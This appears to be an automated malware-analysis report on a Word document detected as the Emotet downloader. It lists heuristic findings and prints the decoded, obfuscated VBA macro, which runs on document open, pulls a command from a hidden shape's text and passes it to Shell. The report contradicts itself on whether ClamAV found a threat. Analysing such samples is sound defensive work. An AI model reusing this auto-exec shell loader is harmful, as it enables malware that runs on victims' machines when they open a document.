Verdict: MALICIOUS
Risk Score: 292
Heuristics: 10

- ClamAV: Doc.Downloader.Emotet-6780510-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6780510-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `.Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4847 bytes |

SHA-256: 642af68338dd3b85054af97c2bf126db9d3172d404fa4ee5168d950fae71f323

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 142 of 173 identifiers look randomly generated (e.g. 'JonkdJdribVqCcOiakdcAsLk') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "OrRhjCEQYBWHER"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
lFhWQUo
End Sub
Attribute VB_Name = "WuXAvEX"
Function lFhWQUo()
On Error Resume Next
hTILiiEasCazojiHiBAzR = (265717628 + Round(sVmaBFmccElDdNJ) * 279658780 - mNSlYihCtNlziEPsM + (qvDCVFazuCjAuYKlM / Tan(WWUmFYHsBiuzVK)))
wTvLksMLaoiWsSMnz = 292065055
WdrUBmCpEHqLwVj = (226359617 + Round(jaJvmAsXGsOGzWlEplH) * 84533675 - OuzFQNFirUfwVmNSKjdzwv + (ojFkEHJkbVoSjJpWnmpPXjJ / Tan(jYmiBdNpTALWLcAbhkDb)))
UjJVNqMHfVFabAjUiiwH = 339112785
IbbrcwiDuUzhLSrGZjLwiY = (103593892 + Round(GwGChBqaiaFEsUOlpY) * 188876587 - rUwBWjomDYFjLG + (fscWtiXDlNnNEVaIJvOcl / Tan(FfBNDXFVVsljjt)))
CjXURLnjSjRcPvoz = 198988965
GRLBrXaiQHilaOQu = (283288209 + Round(HlHZopvjEGqfPjHuM) * 100974446 - wTiczKlTzzdNrzY + (JDhdWGLTTrlszdfBA / Tan(swdIKOCVzjatzhqSzrflm)))
IKJFZtWUUbMGFalBsSaBIis = 174499907
RCiStuzblwjpJDNONAQr = (129642150 + Round(IpfuikVjOuKjuiGLY) * 267006074 - uGsFrvuvrWRlwJAu + (mwLOGEkoiZJfIBbcdZKQjo / Tan(opdKwIOatnRYadzoCHQNVkQj)))
qJSjpiFwzWYctojPzP = 285516615
rToNpUfEVbhidvtEhOsZ = (233346116 + Round(nIqMFazZFSmTsFBi) * 237568522 - RhoJzEoWmQQNzKz + (jfWdOFFvWOrJCnDCimHB / Tan(dJmXjoiIrVbWMZVIGr)))
ctnkMfTwNOjLCvIC = 144366113
TwErSZVOhwvMrfbiCHWHjEm = (179487441 + Round(foDwCJjoiQSqBfZ) * 57100964 - llpHorhNFqiKLOLdlmlRPfn + (XNOInBbzzlSBlwrw / Tan(lwTAiSBGNPsnrfGwij)))
cYaDOlKZwKrnupvdiTK = 296641512
CFOdfDPDGmXhJwpJumwB = (305713998 + Round(EdBGEhTZrKavzLqCJL) * 298580586 - QHaSzWSNddCLljAl + (ZzhkhvMHNAiTrclHiFz / Tan(jGiPFwNHOKQKFb)))
MLcjLNLlVoulBREDbDirT = 111240274
zSpOvZBHGDKkLLEnYn = (155630660 + Round(DaKbZnQZVolCTcwjjQXRf) * 57483490 - zHuPrPwizBuRXHOoH + (blRSHRiNUDIPFEu / Tan(NTfYZKYGoAZLbbVb)))
JDWwizdhiusZhvpWM = 301663205
BKshzowBKbIsnBjiXBHiXKH = (103515116 + Round(VOOXiaPjCOVoZFvqN) * 153372170 - JonkdJdribVqCcOiakdcAsLk + (LpzwMsJnIGihdlOFjkFhYT / Tan(KbUFkuwQcDwRTfuS)))
LCuWkwzzPXRIGCNsinUrm = 167047239
Const qHVGfkUWS = 0
SpULqCFMdwhDvPftzoHm = (167557558 + Round(ojpCjWzuoaARzsKanBs) * 155512407 - QzGdpHZthhKGsAkWoTiNiH + (DiQmjXBGuBmXkiY / Tan(OZBHtqLHrZDziJJFJtDzYVq)))
jaQEFdAnPYTojAMMTJ = 306855654
zLOQbAsWkrNmriWY = (233440611 + Round(TWihcAlEqZzsRE) * 164268138 - CLluTFOlHFirtzzm + (GDIiPiNfWKTZrZJNhfLmo / Tan(NHwaXWuLtbKLLAQfmdYP)))
vvMQfVdLRmAsZpAhpLqkLRrO = 208735694
Set BYkrhO = OrRhjCEQYBWHER.Shapes(qVYIj + "tESslznR" + jPajCfCfM)
CROTWlMjYfSIrAAUt = (52119434 + Round(trQqCpZDHAjjZiYkCawLPiD) * 174218891 - clpjAOGjvHYlbMiwhFjr + (saTQwtzwfPopLZDjUHmazdbz / Tan(aOSOhYTifjLVTBUJkPrkvPma)))
MzwRzPwURXiihzqU = 48015641
nDTHuwzNnlpPJAUwwHEXf = (189752455 + Round(SdjVwYJdHkXWkYwYFdhdJEO) * 276182242 - luIIKACKLBdNbCpiH + (fldkawjzuwzjOPqFKiAVw / Tan(ULZWVKdbswBVjDlBTKZLG)))
LcnOWVrKimluRSL = 23292253
jcPwqBVfMzdbmNwhwOdjJB = (61755534 + Round(tQvTwvmRorVomTwjaCnLO) * 20398826 - WDiHAiVdfTfDZGBiR + (MmusHvfQwGGOzVpB / Tan(QOnmiTOpVGPYaYUVwCQ)))
iwmcklOWRVJOYjlUib = 193209678
ZjOmdmsPscwnAcudsT = (67697133 + Round(zJiZJzdFMIHUHYzshCzX) * 29499270 - zmjwYtwKzSHNTPwpciImCjUb + (bfBvpVnaCJvpNbkJBJpN / Tan(EiusZTORuQRIQwOuPJwUmRF)))
APCYdAaiOkWwGD = 103922595
fiuOmuVi = BYkrhO.TextFrame.TextRange + PmzssI + Htdhw + srKRpou + ujZRnLt + dJMYTTYC + FkiUN + amVcjU + mQEEbbFz + PAZDqzZ + dQTYrtn + KMJwIijC + mmUoXwFD
YvJuaRGFmtdMGdNYPrTS = (32776378 + Round(ntazUzDkrLNcMzTRw) * 9806046 - JdbOFkcdLvLhUYGI + (UdzICBBSzdQQEzsSH / Tan(oMiUNsUrpfdsEGpCzVDCHbZ)))
GGLMGzSPNdSwmzQFnKMWoGZK = 179591521
UFtYrQHmmXAvtjquijAVij = (330654234 + Round(NzZXAFFJiAjbjSlwpYLL) * 153120000 - cPaPiBZuKlHPKsrklhRqQtCP + (PuCjFYmGRXJwlWDj / Tan(qvURHtGEndtjfjMLBSHXN)))
MUItVhnzLOGfCH = 312604482
fZUIabwWilBRQrqzjYO = (173221070 + Round(WftSMYkijKNvZiXuuhYh) * 201443851 - TwdlPzIZjWjtJu + (qODNnwaoWqISCprqsBT / Tan(zobIlaJiqMfZdTDT)))
TqEtIHuGjFkpfqspid = 13586502
HRuIRXvntcWKfcNAm = (52658082 + Round(WfspklARYaHroPYKNfrPhTR) * 111390502 - FaGpNiUYsjjPbKWRGXNm + (hvGSAVvsKCObLiLtcKsnS / Tan(iovlUUwawDitXfzWNMYjhdVn)))
fLXiNVwSlMSXOAbuj = 41648165
SGftFzfPm = Array(FTHVoJ, wiijbmS, zwLzlwXK, Interaction _
 _
 _
 _
 _
 _
 _
 _
 .Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf)
HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs)))
DFlkusZzkpQVwjVZUllQCsG = 23349787
ZHERRTRWRiFaowWvoXQEj = (125718479 + Round(DDdWtTmkFhbrPLLfECVjRKk) * 304362306 - iEquuwwGMBOowXDiuAsNH + (kcrLBOmdsSilKPv / Tan(KldkDJzrHiSBWKrjibTOCj)))
jTiIvFLMojEqHkWDbfzEXvl = 44604557
End Function
```